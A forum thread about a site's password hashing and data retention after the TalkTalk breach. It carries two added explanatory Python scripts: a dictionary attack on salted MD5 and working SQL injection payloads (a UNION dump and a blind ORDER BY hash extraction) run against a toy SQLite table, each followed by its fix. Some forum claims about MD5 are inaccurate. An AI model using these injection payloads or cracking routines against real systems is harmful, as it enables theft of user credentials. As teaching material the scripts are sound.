Oooh it's all new

better security than TalkTalk too :P

In all seriousness, it is! :)

This site doesn't hold much in the way of people's personal data - just email addresses, and the associated password, really.

The passwords are encrypted (unlike with Talk Talk), and if the database were stolen those passwords couldn't be used by the hackers (there's no unencrypt for the way the passwords are stored).

The database could be stolen, but it never has been. I know this because of some of the email addies of mine which are in it, which only exist in the database here. I take website security seriously, but I'm not so daft as to think it couldn't happen here. In many ways I'm very surprised that it never has, and I keep my fingers firmly crossed that it never will.

One of the reasons I use PayPal for taking payments is to avoid the risk of that data being stolen from here (as well as removing the maintenance overheads of keeping that data safe with security patches/upgrades).



I bet it could be eventually ;) What algorithm are you using?


That may well have been true prior to the update, but the current STORE setup saves people's addresses, and even if buying gold membership by PayPal it receives a postal address from PayPal (it is clearly configured as if purchasing a physical item), so the site software would have a person's real address on file. The edit profile option allows people to put all sorts of personal data in there, including date of birth; you shouldn't be encouraging people to give ANY personal information that isn't strictly required, IMO. Also the old 'donate' button has gone, which means you can't donate anonymously by PayPal; the new one wants data.



You can get names and addresses from things far easier than hacking here (and the amount retained here is very minimal anyway).

I think you need to put your paranoia away.


It's hardly paranoid to believe there are people out there committing identity theft, and it's not unknown for people to sell on data, subscription lists etc. The default option for this forum software seems to be to retain all data; you, or some future owner of this website, could make use of this data. I'm not for a second suggesting you WOULD, but if the data isn't there in the first place (and there is no need for it to be) then it can't be hacked or sold etc.


MD5. Now tell me again it can be unencrypted.

It has no unencrypt, by design.

Oh. Turns out you can get possible values for the original password, but not the exact password, since MD5 hashing is lossy. In fact, it's not technically encrypted at all, it's hashed.

But then, you already knew that didn't you?;)

Having said that, I'll just leave this here: http://security.stackexchange.com/questions/15790/why-do-people-still-use-recommend-md5-if-it-is-cracked-since-1996


I think MD5 is still crackable with the salts, isn't it?

Not that it's worth cracking the passwords here at all.

TalkTalk was taken by simple SQL injection, which, for those who have no idea, means using software to send requests to the server, saving/compiling the error codes that it returns and populating the entire site's tables. It's amazing that wasn't tightened up years ago at something the size of TalkTalk.



You'd use rainbow tables to crack MD5. The salt makes it harder to crack, but it's still doable. But from what I can tell, you can work out potential passwords that would hash to the MD5 value in the database, but you couldn't be sure that it was the exact password chosen by the user. Dictionaries of common passwords can help in guessing the most likely candidates, but you can never be sure since MD5 hashing is lossy.

There just isn't enough information in the hash to 100% reconstruct the password.
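The posts above argue about salts, rainbow tables and whether a salted MD5 hash can be "cracked". The script below is an added example, not code from this forum or its software, and it assumes a storage scheme of md5(salt || password) with a per-user random salt; the board's real scheme is not stated in the thread and does not change the conclusion. It runs the same dictionary attack against salted MD5 and against a deliberately slow password hash (PBKDF2-HMAC-SHA256 from the standard library, standing in for bcrypt/scrypt/Argon2), then measures guesses per second for each. The credentials and wordlist are constructed for the example. What it shows: the salt defeats precomputed rainbow tables, because every user needs a fresh table, but it does nothing against per-user guessing, and MD5 is so fast that guessing is cheap. A dictionary hit is, for practical purposes, the user's password: two short candidate strings colliding by accident under a 128-bit digest is not something you will see, and the known MD5 collision attacks need crafted inputs, not naturally chosen passwords.

```python
import hashlib
import os
import time

# Constructed sample credentials (not real accounts). Carol's password is
# deliberately absent from the wordlist so one row stays uncracked.
SAMPLE_CREDS = [
    ("alice", "letmein"),
    ("bob", "Password1"),
    ("carol", "xk!7Qz#Lp9vB"),
]

# Constructed mini wordlist; real attacks use lists with millions of entries.
WORDLIST = ["123456", "password", "letmein", "qwerty", "Password1", "monkey"]

PBKDF2_ITERATIONS = 100_000  # assumption: a realistic cost factor for this KDF


def md5_salted(salt: bytes, password: str) -> str:
    """Assumed forum scheme: one fast MD5 over salt || password."""
    return hashlib.md5(salt + password.encode()).hexdigest()


def pbkdf2_salted(salt: bytes, password: str) -> str:
    """Slow, salted KDF from the standard library; the per-guess cost is the point."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt,
                               PBKDF2_ITERATIONS).hex()


def build_table(creds, hash_fn, salt_len=16):
    """Store (salt, digest) per user. A random per-user salt means a single
    precomputed rainbow table cannot be reused across users or sites."""
    table = {}
    for user, password in creds:
        salt = os.urandom(salt_len)
        table[user] = (salt.hex(), hash_fn(salt, password))
    return table


def crack_table(table, wordlist, hash_fn):
    """Dictionary attack. The salt sits beside the digest in the stolen table,
    so the attacker simply re-hashes every candidate with that user's salt."""
    found = {}
    for user, (salt_hex, digest) in table.items():
        salt = bytes.fromhex(salt_hex)
        for candidate in wordlist:
            if hash_fn(salt, candidate) == digest:
                found[user] = candidate
                break
    return found


def guesses_per_second(hash_fn, seconds=0.25):
    """Rough single-threaded guess rate for hash_fn on this machine."""
    salt = b"\x00" * 16
    count, start = 0, time.perf_counter()
    while time.perf_counter() - start < seconds:
        hash_fn(salt, f"candidate{count}")
        count += 1
    return count / (time.perf_counter() - start)


if __name__ == "__main__":
    md5_table = build_table(SAMPLE_CREDS, md5_salted)
    print("salted MD5 cracked:   ", crack_table(md5_table, WORDLIST, md5_salted))
    kdf_table = build_table(SAMPLE_CREDS, pbkdf2_salted)
    print("PBKDF2 cracked:       ", crack_table(kdf_table, WORDLIST, pbkdf2_salted))
    print(f"MD5 guesses/s:    {guesses_per_second(md5_salted):,.0f}")
    print(f"PBKDF2 guesses/s: {guesses_per_second(pbkdf2_salted):,.0f}")
```

Both tables give up alice and bob to the same six-word list; the difference is that the slow KDF costs roughly a hundred thousand MD5-equivalents per guess, which is what turns a wordlist of a few hundred million entries from minutes into years per user. Carol survives either way only because her password is not in the list.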


But yeah, SQL Injection vulnerabilities are pretty inexcusable in this day and age. There can be more obscure issues for custom sorts, but they can be easily fixed with whitelisting. The worst thing is, it's bound to have been noticed by at least one of their developers over the years, but seemingly they didn't have a culture that allowed people to speak up and get things fixed.
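The two SQL injection posts above describe feeding requests to a server and reading the whole table back out of its responses, and note that sort parameters are the awkward case that needs a whitelist. The script below is an added example, not code from TalkTalk, this forum or its software; it uses an in-memory SQLite database with a constructed members table (two made-up rows with fake hash values) to show both halves. The vulnerable query pastes a name filter and a sort column straight into SQL: a UNION through the filter dumps the hash column in one request, and even if nothing but row order is visible, the ORDER BY injection point leaks a hash one hex digit at a time by asking true/false questions. The hardened query binds the filter as a parameter and, because an ORDER BY identifier cannot be bound, checks the sort column against a fixed whitelist.

```python
import sqlite3

# Constructed sample rows (not real members). The emails are chosen so that
# sorting by name and sorting by email give different orders, which is what
# the blind extraction below uses as its one-bit oracle.
SAMPLE_MEMBERS = [
    ("alice", "zed@example.com", "9e107d9d372bb6826bd81d3542a4a8a4"),
    ("bob",   "bob@example.com", "e4d909c290d0fb1ca068ffaddf22cbd0"),
]

# ORDER BY cannot take a bound parameter, so the identifier is whitelisted instead.
ALLOWED_SORT_COLUMNS = {"name", "email"}


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (name TEXT, email TEXT, pw_hash TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", SAMPLE_MEMBERS)
    return conn


def list_members_vulnerable(conn, name_prefix, sort_by):
    """Both inputs are concatenated into the SQL text: injectable twice."""
    sql = (f"SELECT name, email FROM members "
           f"WHERE name LIKE '{name_prefix}%' ORDER BY {sort_by}")
    return conn.execute(sql).fetchall()


def list_members_safe(conn, name_prefix, sort_by):
    """Value goes in as a bound parameter; the identifier must be on the whitelist."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_by!r}")
    sql = f"SELECT name, email FROM members WHERE name LIKE ? ORDER BY {sort_by}"
    return conn.execute(sql, (name_prefix + "%",)).fetchall()


# Attack 1: close the quote, UNION in the column we want, comment out the rest.
UNION_PAYLOAD = "' UNION SELECT name, pw_hash FROM members --"


def dump_hashes_via_union(conn):
    """Returns (name, pw_hash) pairs in the 'email' column of the response."""
    return list_members_vulnerable(conn, UNION_PAYLOAD, "name")


# Attack 2: boolean-based blind through ORDER BY. The payload sorts by name
# when the guessed digit is right and by email when it is wrong, so the
# response order answers one yes/no question per request.
def blind_extract_hash(conn, victim, length=32, alphabet="0123456789abcdef"):
    order_when_true = list_members_vulnerable(conn, "", "name")
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            payload = (f"(CASE WHEN (SELECT substr(pw_hash,{pos},1) FROM members "
                       f"WHERE name='{victim}')='{ch}' THEN name ELSE email END)")
            if list_members_vulnerable(conn, "", payload) == order_when_true:
                recovered += ch
                break
        else:
            raise RuntimeError(f"no digit matched at position {pos}")
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("UNION dump:", dump_hashes_via_union(db))
    print("blind dump of alice:", blind_extract_hash(db, "alice"))
    print("safe query with UNION payload:", list_members_safe(db, UNION_PAYLOAD, "name"))
    try:
        list_members_safe(db, "", "(CASE WHEN 1=1 THEN name ELSE email END)")
    except ValueError as exc:
        print("safe query rejected sort column:", exc)
```

The blind path needs at most 16 requests per hex digit, 512 per hash, which is exactly the "send requests and compile the responses" loop the post describes and the reason an off-the-shelf tool can empty a table with one click. The fix does not have to be clever: a bound parameter for every value and a closed set of allowed identifiers for anything that cannot be bound.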


Can't say I've ever tried cracking an MD5 hash; I just remember reading it was possible. I've obtained the list of hashes & salts (from my own websites) when testing vulnerabilities in modules/plugins. You would think a company the size of TalkTalk would have been all over that years ago, & not keeping all data at least hashed (preferably completely encrypted) is a big no-no, especially if you are holding CC details and all kinds of sensitive stuff.


Ha, it sounds way more complicated than it is, mate. If you have a site that is vulnerable to SQL injection, it only takes a click of an injection tool to do all of the above.

I haven't and will never have a clue about any of this stuff. You may as well be talking in Russian for all the understanding that I'm going to gain. Unfortunately I'm a complete technophobe in a time when being so isn't very advantageous. Ho hum.


Anyone know if there is a 'delete all' function for quoted text in the reply box on the mobile version? I can only delete one character at a time, which, given the size of the post I quoted in error, is a right pain.

On iPhone you can just highlight and delete; I presume it's the same for Android?
